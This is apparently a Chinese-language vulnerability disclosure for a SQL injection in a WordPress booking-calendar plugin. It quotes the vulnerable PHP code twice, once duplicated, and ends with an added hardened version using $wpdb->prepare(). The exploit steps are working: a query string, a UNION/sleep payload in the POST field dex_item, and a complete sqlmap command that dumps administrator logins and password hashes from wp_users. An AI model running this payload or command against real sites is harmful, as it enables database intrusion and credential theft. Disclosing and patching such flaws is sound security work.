<ul><li>/dex_bccf.php</li></ul><pre class="">function dex_bccf_caculate_price($startday, $enddate, $calendar, $default_price) { ... //$calendar is not sanitized in sql query $codes = $wpdb->get_results( 'SELECT * FROM '.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE `cal_id`='.$calendar); $mode = (dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) == 'false'); while ( (($enddate>$startday) && !$mode) || (($enddate>=$startday) && $mode) ) { $daily_price = $default_price; $sprice = array(); foreach ($codes as $value) { $sfrom = strtotime($value->date_from); $sto = strtotime($value->date_to); if ($startday >= $sfrom && $startday <= $sto) { $sprice = explode (';', $value->price); $daily_price = $sprice[0]; } } $season_prices[] = $sprice; $price += $daily_price; $startday = strtotime (date("Y-m-d", $startday)." +1 day"); //60*60*24; $days++; } ... }...
<ul><li>/dex_bccf.php</li></ul><pre class="">function dex_bccf_caculate_price($startday, $enddate, $calendar, $default_price) { ... //$calendar is not sanitized in sql query $codes = $wpdb->get_results( 'SELECT * FROM '.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE `cal_id`='.$calendar); $mode = (dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) == 'false'); while ( (($enddate>$startday) && !$mode) || (($enddate>=$startday) && $mode) ) { $daily_price = $default_price; $sprice = array(); foreach ($codes as $value) { $sfrom = strtotime($value->date_from); $sto = strtotime($value->date_to); if ($startday >= $sfrom && $startday <= $sto) { $sprice = explode (';', $value->price); $daily_price = $sprice[0]; } } $season_prices[] = $sprice; $price += $daily_price; $startday = strtotime (date("Y-m-d", $startday)." +1 day"); //60*60*24; $days++; } ... } </pre><p>$calendar未经过过滤带入SQL语句导致注入。为了达成注入条件,需要令:</p><pre class="">$enddate>$startday</pre><p>并且</p><pre class="">$startday >= $sfrom && $startday <= $sto</pre><p>构造querystring:</p><pre class="">action=dex_bccf_check_posted_data&dex_bccf=getcost&from=2014-1-1&to=2014-1-2</pre><p>POST内容:</p><pre class="">dex_item=1 union select 0x32323B2332,1,sleep(10),3,0x323031342D312D33</pre><p>执行的SQL语句为:</p><pre class="">SELECT * FROM wp_bccf_reservation_calendars WHERE id=1 union select 0x32323B2332,1,sleep(3),3,0x323031342D312D33</pre><p>证明漏洞存在。</p><p>使用sqlmap,获取管理员的帐号密码。使用命令:</p><pre class="">python sqlmap.py -u "http://10.211.55.3/wordpress/?action=dex_bccf_check_posted_data&dex_bccf=getcost&from=2014-1-1&to=2014-1-2" --data="dex_item=1" -p dex_item --dbms=mysql -D wordpress -T wp_users -C user_login,user_pass --dump<span style="font-family: arial, sans-serif; font-size: 16px; line-height: 1.6; background-color: transparent;"> </span></pre><p><img alt="C41F761A-C60C-4806-9951-6B640FFF9961.png" src="https://images.seebug.org/@/uploads/1434437047822-C41F761A-C60C-4806-9951-6B640FFF9961.png" 
data-image-size="811,427"><br></p><p>得到管理员的帐号密码: </p><p><img alt="2F36813B-D31C-48F8-B5FA-D62DFCC9DFE2.png" src="https://images.seebug.org/@/uploads/1434437067124-2F36813B-D31C-48F8-B5FA-D62DFCC9DFE2.png" data-image-size="838,368"><br></p>
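<p>As an added example (not the plugin's own code), the vulnerable query from the function above is shown beside a hardened form that validates the calendar id and binds it through $wpdb->prepare(); it assumes the WordPress $wpdb global and the plugin constant DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX exactly as they appear on the page, and the function names are hypothetical.</p>

```php
<?php
// Added example, not the plugin's code. Assumes WordPress' $wpdb global and the
// plugin constant DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX as shown on the page.

// Before (hypothetical wrapper around the query on the page): $calendar, which
// arrives from the POST field dex_item, is concatenated straight into the SQL
// text, so a value that contains SQL changes the statement itself.
function dex_bccf_season_prices_unsafe($calendar) {
    global $wpdb;
    return $wpdb->get_results(
        'SELECT * FROM ' . $wpdb->prefix . DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX
        . ' WHERE `cal_id`=' . $calendar
    );
}

// After (hypothetical hardened wrapper): accept only a positive integer id and
// pass it through $wpdb->prepare(), which emits %d as an integer literal rather
// than splicing the raw string into the query.
function dex_bccf_season_prices_safe($calendar) {
    global $wpdb;

    // ctype_digit() on the string form rejects "1 union select ...", negative
    // numbers, floats and empty input; a non-positive id has no valid calendar.
    if (!ctype_digit((string) $calendar) || (int) $calendar < 1) {
        return array();
    }
    $cal_id = (int) $calendar;

    // The table name is built from a trusted constant; only the user-controlled
    // id is a parameter.
    $table = $wpdb->prefix . DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX;
    $sql   = $wpdb->prepare("SELECT * FROM `{$table}` WHERE `cal_id` = %d", $cal_id);

    return $wpdb->get_results($sql);
}
```

<p>With the hardened form, the POST body from the write-up fails the ctype_digit() check and the query is never issued, while a plain numeric dex_item behaves exactly as before.</p>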